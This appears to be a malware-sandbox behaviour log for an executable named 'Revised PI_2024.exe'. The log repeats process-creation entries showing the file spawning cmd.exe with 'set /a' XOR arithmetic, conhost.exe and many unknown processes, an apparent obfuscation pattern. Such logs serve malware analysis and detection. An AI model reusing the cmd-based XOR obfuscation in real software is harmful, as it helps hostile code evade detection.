Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: unknown unknown	Jump to behavior
